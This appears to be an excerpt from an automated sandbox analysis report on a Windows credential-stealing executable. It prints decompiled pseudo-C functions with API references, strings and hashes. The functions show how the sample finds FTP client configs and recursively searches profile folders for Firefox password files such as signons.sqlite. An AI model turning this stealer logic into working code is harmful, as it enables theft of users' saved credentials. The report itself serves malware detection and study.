                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • EasyFTP, xrefs: 0040CC08
                                                                        • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CBF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                                                        • API String ID: 1884169789-2776585315
                                                                        • Opcode ID: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
                                                                        • Instruction ID: 833bec486d2f115b47918bfa30de8f6535c6fd2c173ee2e59642ce28720d77dd
                                                                        • Opcode Fuzzy Hash: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
                                                                        • Instruction Fuzzy Hash: 6DF06D70A90208BAEF117BA2CC43FAD7D359B10714F20413B7A05781F2EABD9B51D65C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00401DCE(void* __eflags, signed int _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t12;
                                                                        				intOrPtr _t19;
                                                                        				intOrPtr* _t21;
                                                                        
                                                                        				_v8 = E004017EC(0x105);
                                                                        				if( *0x41446f != 0) {
                                                                        					_t12 =  *0x41446f(0, _a4, 0, 0, _v8); // executed
                                                                        					if(_t12 < 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        				} else {
                                                                        					L3:
                                                                        					E004017D5(_v8);
                                                                        					_v8 = 0;
                                                                        					_t21 = 0x414473;
                                                                        					while( *_t21 != 0) {
                                                                        						_t20 =  *_t21;
                                                                        						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
                                                                        							L7:
                                                                        							_t21 = _t21 + 4;
                                                                        							continue;
                                                                        						} else {
                                                                        							_t19 = E00401C8E( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
                                                                        							if(_t19 == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_v8 = _t19;
                                                                        							}
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L9:
                                                                        				return _v8;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401DF9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401E2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocFolderLocalPath
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 1254228173-2036018995
                                                                        • Opcode ID: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
                                                                        • Instruction ID: a3ddda74c67e5e51f847a673abce941a0f793803ed09e317935be1dd6252c98b
                                                                        • Opcode Fuzzy Hash: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
                                                                        • Instruction Fuzzy Hash: 82017136A00205EBDB119B90CC02B9EB7B5AB44314F244177EA01BB1E0E7789B50DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407C91(void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				int _t11;
                                                                        				void* _t17;
                                                                        
                                                                        				_t17 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x1d, 0);
                                                                        				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                        				if(_t11 != 0) {
                                                                        					_t19 = _t11 - 0x104;
                                                                        					if(_t11 <= 0x104) {
                                                                        						E00403E4C(_a4, E00401D15( &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
                                                                        						E004017D5(_t14);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t17, _t19, _a4, _v8);
                                                                        			}








                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CB5
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                                        • String ID: \32BitFtp.ini
                                                                        • API String ID: 2776971706-1260517637
                                                                        • Opcode ID: a84d678b1756394bbe4d235c71b4e519db7788ff0fbbbd9a3c0442819176ca34
                                                                        • Instruction ID: 2195aeeb4991f3a6115ba96b76fa21cbd29fe7e13ab62e4599c67b56f028ae1e
                                                                        • Opcode Fuzzy Hash: a84d678b1756394bbe4d235c71b4e519db7788ff0fbbbd9a3c0442819176ca34
                                                                        • Instruction Fuzzy Hash: 91F08270900108BAEF11BAA1CC42FDD7A69AB40748F104037B605B51E2EAB8AA809A5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00410C10(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
                                                                        				char _v8;
                                                                        				void* _t6;
                                                                        				signed int _t8;
                                                                        				int _t9;
                                                                        				signed int _t10;
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        
                                                                        				_t17 = __eflags;
                                                                        				_t13 = __ecx;
                                                                        				_t16 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_v8 = 0;
                                                                        				_t6 = E00410B60( &_v8, __ecx, __edx ^ __eax ^ __eax ^ __edx ^ __eax, __eflags,  &_v8); // executed
                                                                        				_t8 = E00402D9C(E00410331(_t6, _t16), "samantha"); // executed
                                                                        				_t9 = E004105CE(_t8, _t13, _t16, _t17); // executed
                                                                        				if( *0x414616 != 0) {
                                                                        					_t19 =  *0x414409;
                                                                        					if( *0x414409 != 0) {
                                                                        						_t9 = RevertToSelf();
                                                                        					}
                                                                        					 *0x4140fe = 0x80000001; // executed
                                                                        				}
                                                                        				_t10 = E0041088B(_t9, _t16); // executed
                                                                        				_t11 = E0041098D(_t10, _t13, _t16); // executed
                                                                        				_t12 = E004106D5(_t11, _t16, _t19); // executed
                                                                        				return _t12;
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 00410B60: OleInitialize.OLE32(00000000), ref: 00410B6E
                                                                          • Part of subcall function 00410B60: GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1
                                                                        • RevertToSelf.ADVAPI32(samantha,00000000), ref: 00410C52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeNameRevertSelfUser
                                                                        • String ID: samantha
                                                                        • API String ID: 1709315701-1704246511
                                                                        • Opcode ID: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
                                                                        • Instruction ID: ba436f915b5ba33af829729ff840d4ee844fee4bebf450b7f9e819facd392308
                                                                        • Opcode Fuzzy Hash: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
                                                                        • Instruction Fuzzy Hash: C2E0ED74A1020897D724FBF7994A7CE36A65B8431CF14813B7410922E2EBFC46D5CAAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004023F5(CHAR* _a4, _Unknown_base(*)()** _a8) {
                                                                        				struct HINSTANCE__* _t4;
                                                                        				struct HINSTANCE__* _t5;
                                                                        				_Unknown_base(*)()* _t8;
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				struct HINSTANCE__* _t10;
                                                                        				CHAR* _t12;
                                                                        				_Unknown_base(*)()** _t13;
                                                                        
                                                                        				_t4 = LoadLibraryA(_a4); // executed
                                                                        				_t5 = _t4;
                                                                        				if(_t5 != 0) {
                                                                        					_t12 = _a4;
                                                                        					_t10 = _t5;
                                                                        					_t13 = _a8;
                                                                        					while(1) {
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t12 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t8 = GetProcAddress(_t10, _t12); // executed
                                                                        						_t9 = _t8;
                                                                        						if(_t9 != 0) {
                                                                        							 *_t13 = _t9;
                                                                        							_t13 = _t13 + 4;
                                                                        							continue;
                                                                        						} else {
                                                                        							return _t9;
                                                                        						}
                                                                        						goto L8;
                                                                        					}
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t5;
                                                                        				}
                                                                        				L8:
                                                                        			}











                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(004143E1,?,?,?,?,0040245E,ole32.dll,004143E1,00410B78), ref: 004023FE
                                                                        • GetProcAddress.KERNEL32(00000000,004143E1), ref: 0040242C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID:
                                                                        • API String ID: 2574300362-0
                                                                        • Opcode ID: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
                                                                        • Instruction ID: 63647a6b9d78679d1f5e0a50425ec40e01c9d34892c3e944a590a543cd3e3713
                                                                        • Opcode Fuzzy Hash: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
                                                                        • Instruction Fuzzy Hash: 7BF0B47321401416D7105A39EC8599B6B88D7E3378B105137F916B72C1E1BDDD85C3A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401E53(CHAR* _a4) {
                                                                        				char* _t4;
                                                                        				void* _t6;
                                                                        				void* _t11;
                                                                        
                                                                        				_t4 = _a4;
                                                                        				if(_t4 == 0 ||  *_t4 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
                                                                        					_t11 = _t6 + 1;
                                                                        					if(_t11 != 0) {
                                                                        						CloseHandle(_t11 - 1);
                                                                        						return 1;
                                                                        					}
                                                                        					return 0;
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E7F
                                                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E8D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
                                                                        • Instruction ID: 3c78a73ec376b71f213996ba39f05dc87e0add78c32be09080ce482926b503b4
                                                                        • Opcode Fuzzy Hash: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
                                                                        • Instruction Fuzzy Hash: B2E04F7239030437FB311679DC83F5A3A88A711B98F544532B641BD2D2E5FDEC80469C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040E5CB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				CHAR* _v8;
                                                                        				char _v12;
                                                                        
                                                                        				if( *0x414441 != 0) {
                                                                        					_v8 = E004017EC(0x105);
                                                                        					_v12 = 0x104;
                                                                        					 *0x414441(_a8, _a8, _v8,  &_v12); // executed
                                                                        					if(lstrlenA(_v8) > 3) {
                                                                        						E00404131(_a4, _v8, ".xml", 0xbeef0000);
                                                                        					}
                                                                        					return E004017D5(_v8);
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}






                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: .xml
                                                                        • API String ID: 1659193697-2937849440
                                                                        • Opcode ID: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
                                                                        • Instruction ID: 5a1537d95f9c1f419a8a440fa280918d6c9dc7d515ed36f1139c0294ba86a765
                                                                        • Opcode Fuzzy Hash: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
                                                                        • Instruction Fuzzy Hash: 35F03A3590010CFBCF11EF91CC46ECDBB75AB54318F208166B550B51B0D77A9BA0EB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401ED7(CHAR* _a4) {
                                                                        				CHAR* _v8;
                                                                        				long _t8;
                                                                        				long _t10;
                                                                        				long _t11;
                                                                        
                                                                        				_t8 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                        				if(_t8 != 0) {
                                                                        					_v8 = E004017EC(_t8);
                                                                        					_t10 = _t8;
                                                                        					_t11 = ExpandEnvironmentStringsA(_a4, _v8, _t10); // executed
                                                                        					if(_t11 != 0) {
                                                                        						return _v8;
                                                                        					}
                                                                        					E004017D5(_v8);
                                                                        					return 0;
                                                                        				}
                                                                        				return _t8;
                                                                        			}








                                                                        APIs
                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401EE4
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401EFF
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandLocalStrings$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2376306162-0
                                                                        • Opcode ID: 1d919932fb61780aa28a7e07a86efcfdc9d920ef220753925131e72dd29416f2
                                                                        • Instruction ID: 7f4f1e0e00ab06bac919c0edf942330a42c35112189e7af74651cb16d4d644b8
                                                                        • Opcode Fuzzy Hash: 1d919932fb61780aa28a7e07a86efcfdc9d920ef220753925131e72dd29416f2
                                                                        • Instruction Fuzzy Hash: E9E01B7150410ABADF11AA71DD02FAD75689B50358F1001367514F51F1FB7D9F50A79C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004013C2(void* _a4, void* _a8, long _a12) {
                                                                        				long _v8;
                                                                        				int _t10;
                                                                        				long _t13;
                                                                        				void* _t15;
                                                                        
                                                                        				_t15 = _a8;
                                                                        				while(1) {
                                                                        					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
                                                                        					if(_t10 == 0 || _v8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t13 = _v8;
                                                                        					_t15 = _t15 + _t13;
                                                                        					_t7 =  &_a12;
                                                                        					 *_t7 = _a12 - _t13;
                                                                        					if( *_t7 != 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        					L6:
                                                                        				}
                                                                        				return 0;
                                                                        				goto L6;
                                                                        			}








                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004013D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
                                                                        • Instruction ID: b2a8a1a4098528e9a7980f2ebc5f3a58106d20ece59f8725bb207e7cc5dc22b0
                                                                        • Opcode Fuzzy Hash: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
                                                                        • Instruction Fuzzy Hash: 7AE03032910219EBDF10DEA4CC41BDF77A89B10358F044126BD14E61D0E6B5DB50C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 25%
                                                                        			E00401000(signed int __eax, signed int __edx, intOrPtr _a4) {
                                                                        
                                                                        				_push(_a4);
                                                                        				_push(1);
                                                                        				_push(0); // executed
                                                                        				L00410DB8(); // executed
                                                                        				return __eax ^ __edx ^ __eax;
                                                                        			}




                                                                        APIs
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
                                                                        • Instruction ID: dea821b72ffdd4c679baa99983bcdd127a299b87b73cb077d53c3cab1c2398ee
                                                                        • Opcode Fuzzy Hash: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
                                                                        • Instruction Fuzzy Hash: 05C092367543082AFB80EEF35C03FDB768B4B91B48F00C435BB04990C5E8F5E49291A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00403DDB() {
                                                                        				char _v404;
                                                                        				char* _t2;
                                                                        
                                                                        				_t2 =  &_v404;
                                                                        				_push(_t2);
                                                                        				_push(0x101); // executed
                                                                        				L00410E90(); // executed
                                                                        				return _t2;
                                                                        			}






                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
                                                                        • Instruction ID: b39ddb2bae58422bad9ef1c852a27b00e881b3ffe9b04fce0b25c26bea8dbb9f
                                                                        • Opcode Fuzzy Hash: 788b9be6feae9eeb2305b67f880ac4d482cd380d992e23d7d77878d23df068a8
                                                                        • Instruction Fuzzy Hash: CBB092326206082AE660A2968C43AE6729D5744708F8401A52B59D12C2EAE5AA9045FA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 00410C80
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
                                                                        • Instruction ID: a53dbb4ca493b7ef7e200f8e6b71ae19aff1122ae8d0357d8058c1ff4ff95ae7
                                                                        • Opcode Fuzzy Hash: c0b8540e317ed233f6ae623aefb25d1a025ca87b903b635d51881dad735b25c2
                                                                        • Instruction Fuzzy Hash: C7A00122B5420956E788FAB31D0A79A00830B81609F25CD2A76149A48BEDF9A0D2045D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004017D5(void* _a4) {
                                                                        
                                                                        				if(_a4 != 0) {
                                                                        					LocalFree(_a4); // executed
                                                                        				}
                                                                        				return 0;
                                                                        			}



                                                                        0x004017dc
                                                                        0x004017e1
                                                                        0x004017e1
                                                                        0x004017e9

                                                                        APIs
                                                                        • LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocal
                                                                        • String ID:
                                                                        • API String ID: 2826327444-0
                                                                        • Opcode ID: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
                                                                        • Instruction ID: 6fbac20c93ee8dcf72c2f2e582e4e5176c4e840c565eb3d7ca7bd60efa235b74
                                                                        • Opcode Fuzzy Hash: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
                                                                        • Instruction Fuzzy Hash: 86C09B7210460856C7155F65C98579A79D85B103CCF5081357905555B1D6B8D5D0C5DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004017EC(intOrPtr _a4) {
                                                                        				void* _t4;
                                                                        
                                                                        				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
                                                                        				return _t4;
                                                                        			}





                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocLocal
                                                                        • String ID:
                                                                        • API String ID: 3494564517-0
                                                                        • Opcode ID: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
                                                                        • Instruction ID: c45b4f91a8b266b6492c347f0c6a08b042b0071dba384013e78457423f248dae
                                                                        • Opcode Fuzzy Hash: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
                                                                        • Instruction Fuzzy Hash: 81B092B120030826E240E789C803F5A728C9B14B8CF008221BB44A6282D8ACF89045AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 93%
                                                                        			E00409484(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t52;
                                                                        				signed int _t54;
                                                                        				CHAR* _t56;
                                                                        				void* _t60;
                                                                        				char* _t63;
                                                                        				int _t65;
                                                                        				char* _t68;
                                                                        				int _t75;
                                                                        				int _t77;
                                                                        				int _t80;
                                                                        				signed int _t82;
                                                                        				void* _t84;
                                                                        				char* _t93;
                                                                        				signed int _t99;
                                                                        				signed int* _t100;
                                                                        				signed int _t101;
                                                                        
                                                                        				_t99 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t52 = _a16;
                                                                        				if(_t52 == 0 ||  *_t52 == 0) {
                                                                        					L31:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_t54 = E004024D7(_a16);
                                                                        					__eflags = _t54;
                                                                        					if(_t54 != 0) {
                                                                        						_t56 = E00401D15(_a16, "*.*");
                                                                        					} else {
                                                                        						_t56 = E00401D15(_a16, "\*.*");
                                                                        					}
                                                                        					_v332 = _t56;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t60 = FindFirstFileA(_v332,  &_v324);
                                                                        					_v328 = _t60;
                                                                        					__eflags = _t60 + 1;
                                                                        					if(_t60 + 1 != 0) {
                                                                        						do {
                                                                        							_t100 =  &_v324;
                                                                        							__eflags =  *_t100 & 0x00000010;
                                                                        							if(( *_t100 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t100[0xb]);
                                                                        								__eflags =  *0x415824 - 3;
                                                                        								if( *0x415824 != 3) {
                                                                        									_t63 = StrStrIA(_v336, "signons.sqlite");
                                                                        									__eflags = _t63;
                                                                        									if(_t63 != 0) {
                                                                        										E004090A3(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
                                                                        										E004017D5(_t90);
                                                                        									}
                                                                        									_t65 = lstrlenA(_v336);
                                                                        									__eflags = _t65 - 2;
                                                                        									if(_t65 < 2) {
                                                                        										L25:
                                                                        										_push(StrStrIA(_v336, "signons.txt"));
                                                                        										_push(StrStrIA(_v336, "signons2.txt"));
                                                                        										_t68 = StrStrIA(_v336, "signons3.txt");
                                                                        										_pop(_t101);
                                                                        										_pop(_t99);
                                                                        										__eflags = _t68;
                                                                        										if(_t68 != 0) {
                                                                        											goto L28;
                                                                        										}
                                                                        										__eflags = _t101;
                                                                        										if(_t101 != 0) {
                                                                        											goto L28;
                                                                        										}
                                                                        										_t99 = _t99;
                                                                        										__eflags = _t99;
                                                                        										if(_t99 == 0) {
                                                                        											goto L29;
                                                                        										}
                                                                        										goto L28;
                                                                        									} else {
                                                                        										__eflags =  *((short*)( &(_v336[_t65]) - 2)) - 0x732e;
                                                                        										if( *((short*)( &(_v336[_t65]) - 2)) != 0x732e) {
                                                                        											goto L25;
                                                                        										}
                                                                        										L28:
                                                                        										E0040912E(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
                                                                        										E004017D5(_t71);
                                                                        										goto L29;
                                                                        									}
                                                                        								}
                                                                        								_t93 = StrStrIA(_v336, "prefs.js");
                                                                        								__eflags = _t93;
                                                                        								if(_t93 != 0) {
                                                                        									E00403E4C(_a4, E00401D69(E00401D15(_a16, "\\"), _v336), 0xbeef0001);
                                                                        									E004017D5(_t96);
                                                                        								}
                                                                        								goto L29;
                                                                        							}
                                                                        							_t77 = lstrcmpiA(0x414806,  &(_t100[0xb]));
                                                                        							__eflags = _t77;
                                                                        							if(_t77 != 0) {
                                                                        								_t80 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
                                                                        								__eflags = _t80;
                                                                        								if(_t80 != 0) {
                                                                        									_t82 = E004024D7(_a16);
                                                                        									__eflags = _t82;
                                                                        									if(_t82 != 0) {
                                                                        										_t84 = E00401D15(_a16, 0);
                                                                        									} else {
                                                                        										_t84 = E00401D15(_a16, "\\");
                                                                        									}
                                                                        									E00409484(_t99, _a4, _a8, _a12, E00401D69(_t84,  &( &_v324->cFileName)));
                                                                        									E004017D5(_t85);
                                                                        								}
                                                                        							}
                                                                        							L29:
                                                                        							_t75 = FindNextFileA(_v328,  &_v324);
                                                                        							__eflags = _t75;
                                                                        						} while (_t75 != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L31;
                                                                        				}
                                                                        			}
























                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004094F4
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00409521
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040953E
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite), ref: 004096D4
                                                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?), ref: 004096E7
